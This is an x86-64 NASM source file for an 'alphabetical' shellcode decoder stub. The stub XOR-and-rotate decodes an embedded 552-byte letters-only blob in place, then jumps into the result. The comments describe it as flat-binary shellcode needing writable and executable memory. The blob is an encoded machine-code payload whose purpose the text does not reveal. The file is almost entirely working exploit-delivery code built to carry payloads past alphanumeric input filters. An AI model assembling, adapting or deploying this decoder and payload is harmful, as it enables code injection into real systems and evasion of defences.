[BITS 64]
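;-----------------------------------------------------------------------
; AlphabeticalDecode  (NASM, x86-64, position independent, never returns)
;
; Decodes EncodedBuffer in place and then jumps to the decoded bytes.
;
; Inputs:    none. Payload, size and key are assembled into this file
;            (EncodedBuffer, BUFFER_SIZE, XOR_KEY).
; Handoff:   rax = address of the decoded payload at the final jmp.
;            rbx, rsi, rdi are saved/restored; rbp, rsp, r12-r15 are never
;            touched, so the payload sees them as they were on entry.
;            Clobbered: rax, rcx, rdx, r8, r9, flags.
;
; Memory:    the stores below land on EncodedBuffer, which is part of the
;            same flat image as this code (no section directives, so this
;            is flat-binary shellcode). The whole image must therefore sit
;            in memory that is both writable and executable; in a normal
;            read-only .text section the first store faults.
;
; Encoding reversed here, for output byte i read from input WORD i
; (low byte = bTransformed, high byte = bOffset):
;     out[i] = ((bTransformed ^ XOR_KEY) ror 4) - bOffset
; followed by swapping the two WORDs of every full DWORD of the output.
; In-place decoding is safe because output index i is never above the
; input indices 2i / 2i+1 it was read from. Only the payload is made of
; letters; this decoder stub itself is ordinary machine code and will not
; pass an alphanumeric-only filter on its own.
;
; NOTE(review): the final jmp is an indirect branch; if the target process
; enforces IBT/CET the decoded payload would need to start with endbr64.
;-----------------------------------------------------------------------
AlphabeticalDecode:
    push    rbx                         ; preserved for the payload
    push    rsi
    push    rdi

    lea     rsi, [rel EncodedBuffer]    ; RIP-relative: no call/pop detour needed
    mov     ebx, BUFFER_SIZE            ; encoded size in bytes
    mov     edi, ebx
    shr     edi, 1                      ; edi = decoded size = number of input WORDs

    ; ---- pass 1: per-byte transform, written in place at index i ----
    xor     ecx, ecx                    ; i = 0
.DecodeLoop:
    cmp     ecx, edi
    jae     .DecodeComplete
    movzx   eax, word [rsi + rcx*2]     ; input WORD i
    mov     r8b, al                     ; bTransformed
    shr     eax, 8
    mov     r9b, al                     ; bOffset
    xor     r8b, XOR_KEY
    ror     r8b, 4                      ; nibble swap (encoder's rotate undone)
    sub     r8b, r9b
    mov     byte [rsi + rcx], r8b       ; out[i]
    inc     ecx
    jmp     short .DecodeLoop
.DecodeComplete:

    ; ---- pass 2: swap the two WORDs of each full DWORD ----
    mov     eax, edi
    shr     eax, 2                      ; DWORD count; 1-3 trailing bytes stay as decoded
    xor     ecx, ecx
.ShuffleLoop:
    cmp     ecx, eax
    jae     .ShuffleComplete
    mov     edx, dword [rsi + rcx*4]
    rol     edx, 16                     ; same as ror 16: direction does not matter
    mov     dword [rsi + rcx*4], edx
    inc     ecx
    jmp     short .ShuffleLoop
.ShuffleComplete:

    ; ---- pass 3: zero the now-unused upper half [decoded, 2*decoded) ----
    lea     rax, [rsi + rdi]            ; first byte past the decoded payload
    mov     ecx, edi                    ; bytes to clear = decoded size
    xor     edx, edx
.ClearLoop:
    test    rcx, rcx
    jz      .ClearComplete
    mov     byte [rax], dl
    inc     rax
    dec     rcx
    jmp     short .ClearLoop
.ClearComplete:

    mov     rax, rsi                    ; payload address for the handoff
    pop     rdi
    pop     rsi
    pop     rbx
    jmp     rax                         ; tail-jump into the decoded payload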
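;-----------------------------------------------------------------------
; Payload and encoder parameters.
; XOR_KEY must be the key the encoder used; with a wrong key the stub
; still jumps into whatever garbage the decode produces.
; EncodedBuffer holds two encoded bytes per decoded byte and, as assembled
; here, consists only of ASCII letters (hence "alphabetical"). The decoder
; overwrites it in place, so it must be loaded together with the stub into
; writable+executable memory.
;-----------------------------------------------------------------------
XOR_KEY equ 0xAB
EncodedBuffer:
db 0x67, 0x49, 0x4E, 0x7A, 0x6F, 0x50, 0x42, 0x56, 0x69, 0x6C, 0x6D, 0x6C, 0x58, 0x4F, 0x6E, 0x74
db 0x61, 0x6B, 0x70, 0x6C, 0x4D, 0x6E, 0x6F, 0x4C, 0x67, 0x7A, 0x62, 0x4B, 0x61, 0x6B, 0x62, 0x4C
db 0x62, 0x6B, 0x6A, 0x4A, 0x61, 0x56, 0x51, 0x67, 0x67, 0x41, 0x61, 0x5A, 0x66, 0x77, 0x70, 0x75
db 0x66, 0x51, 0x62, 0x4A, 0x67, 0x6C, 0x70, 0x75, 0x65, 0x61, 0x62, 0x4A, 0x63, 0x74, 0x63, 0x44
db 0x66, 0x51, 0x67, 0x5A, 0x6D, 0x4C, 0x70, 0x75, 0x6E, 0x4D, 0x6B, 0x55, 0x70, 0x6D, 0x62, 0x54
db 0x43, 0x41, 0x62, 0x6B, 0x73, 0x43, 0x70, 0x73, 0x6C, 0x4B, 0x69, 0x6C, 0x6A, 0x53, 0x62, 0x54
db 0x67, 0x6B, 0x67, 0x50, 0x75, 0x41, 0x63, 0x50, 0x6D, 0x4C, 0x63, 0x4B, 0x6F, 0x4A, 0x4D, 0x42
db 0x4F, 0x41, 0x63, 0x4B, 0x69, 0x6B, 0x68, 0x73, 0x68, 0x5A, 0x68, 0x4F, 0x6F, 0x4B, 0x69, 0x6B
db 0x70, 0x6C, 0x41, 0x66, 0x67, 0x7A, 0x63, 0x4B, 0x6D, 0x4C, 0x65, 0x61, 0x64, 0x71, 0x61, 0x5A
db 0x61, 0x64, 0x6F, 0x4B, 0x53, 0x4D, 0x61, 0x70, 0x65, 0x6C, 0x64, 0x74, 0x6A, 0x4C, 0x67, 0x41
db 0x6F, 0x4C, 0x61, 0x64, 0x6F, 0x4C, 0x4D, 0x6E, 0x50, 0x4B, 0x61, 0x45, 0x64, 0x77, 0x6B, 0x4C
db 0x5A, 0x4F, 0x70, 0x6D, 0x51, 0x67, 0x6F, 0x4B, 0x6C, 0x64, 0x70, 0x79, 0x66, 0x51, 0x61, 0x64
db 0x6D, 0x4C, 0x70, 0x74, 0x66, 0x51, 0x63, 0x4C, 0x6F, 0x69, 0x61, 0x56, 0x6D, 0x6B, 0x6A, 0x4C
db 0x68, 0x73, 0x61, 0x6B, 0x62, 0x54, 0x6F, 0x4D, 0x64, 0x74, 0x43, 0x46, 0x66, 0x51, 0x43, 0x5A
db 0x62, 0x4F, 0x6C, 0x4B, 0x6F, 0x4B, 0x69, 0x56, 0x6C, 0x4B, 0x6B, 0x4C, 0x4A, 0x55, 0x52, 0x57
db 0x6B, 0x4B, 0x68, 0x73, 0x4B, 0x62, 0x63, 0x4B, 0x6D, 0x6B, 0x69, 0x6B, 0x4D, 0x61, 0x63, 0x4B
db 0x57, 0x5A, 0x6E, 0x6B, 0x42, 0x66, 0x6F, 0x6C, 0x73, 0x41, 0x62, 0x78, 0x71, 0x61, 0x6E, 0x59
db 0x72, 0x64, 0x6A, 0x4B, 0x6D, 0x64, 0x62, 0x57, 0x70, 0x65, 0x70, 0x79, 0x65, 0x77, 0x69, 0x54
db 0x4D, 0x4A, 0x62, 0x53, 0x65, 0x61, 0x61, 0x6C, 0x61, 0x46, 0x61, 0x6B, 0x6D, 0x6B, 0x4A, 0x4E
db 0x63, 0x44, 0x62, 0x58, 0x67, 0x41, 0x4D, 0x62, 0x4D, 0x52, 0x53, 0x46, 0x66, 0x51, 0x63, 0x4C
db 0x63, 0x4B, 0x64, 0x71, 0x6D, 0x6B, 0x68, 0x6C, 0x61, 0x64, 0x6D, 0x6B, 0x6C, 0x78, 0x46, 0x56
db 0x61, 0x54, 0x63, 0x4B, 0x6A, 0x4C, 0x63, 0x4B, 0x67, 0x73, 0x52, 0x45, 0x41, 0x56, 0x52, 0x41
db 0x61, 0x6B, 0x67, 0x73, 0x63, 0x4B, 0x61, 0x54, 0x61, 0x64, 0x67, 0x49, 0x63, 0x4B, 0x61, 0x52
db 0x41, 0x6D, 0x67, 0x7A, 0x68, 0x50, 0x63, 0x6C, 0x51, 0x57, 0x61, 0x6B, 0x6D, 0x6D, 0x69, 0x4C
db 0x62, 0x54, 0x66, 0x51, 0x70, 0x64, 0x70, 0x63, 0x67, 0x75, 0x4D, 0x6F, 0x6D, 0x5A, 0x4F, 0x65
db 0x61, 0x4F, 0x70, 0x75, 0x4D, 0x6F, 0x6F, 0x4D, 0x6D, 0x6C, 0x6F, 0x4C, 0x6B, 0x52, 0x6D, 0x6B
db 0x6D, 0x6C, 0x6F, 0x4C, 0x6D, 0x6C, 0x6D, 0x6C, 0x66, 0x4F, 0x64, 0x6F, 0x6F, 0x4C, 0x50, 0x77
db 0x6D, 0x6C, 0x6F, 0x4C, 0x6F, 0x4B, 0x6F, 0x4B, 0x6C, 0x4B, 0x65, 0x61, 0x61, 0x6B, 0x54, 0x45
db 0x6D, 0x6D, 0x5A, 0x4A, 0x66, 0x6D, 0x74, 0x76, 0x69, 0x77, 0x6B, 0x6A, 0x69, 0x71, 0x68, 0x4C
db 0x6B, 0x52, 0x65, 0x46, 0x67, 0x76, 0x63, 0x4B, 0x65, 0x4F, 0x6D, 0x6D, 0x65, 0x57, 0x44, 0x41
db 0x64, 0x79, 0x69, 0x68, 0x68, 0x67, 0x62, 0x54, 0x6D, 0x66, 0x67, 0x50, 0x63, 0x64, 0x63, 0x50
db 0x68, 0x41, 0x69, 0x4C, 0x6E, 0x52, 0x67, 0x4C, 0x74, 0x42, 0x50, 0x78, 0x67, 0x57, 0x4F, 0x49
db 0x70, 0x4E, 0x70, 0x53, 0x6D, 0x59, 0x67, 0x5A, 0x61, 0x6B, 0x44, 0x75, 0x6D, 0x6C, 0x70, 0x64
db 0x6F, 0x77, 0x66, 0x79, 0x4A, 0x44, 0x4F, 0x4F, 0x47, 0x6B, 0x62, 0x6E, 0x61, 0x4B, 0x71, 0x41
db 0x66, 0x77, 0x6F, 0x4C, 0x67, 0x67, 0x65, 0x74
; Encoded size derived from the data above (currently 552 = 0x228 bytes)
; instead of a hand-typed constant, so swapping in a new payload cannot
; leave it stale. A stale value that is too large makes the decoder read
; and zero memory past the end of the buffer; too small truncates the
; payload. Keep it even: the decoder consumes two bytes per output byte.
BUFFER_SIZE equ $ - EncodedBuffer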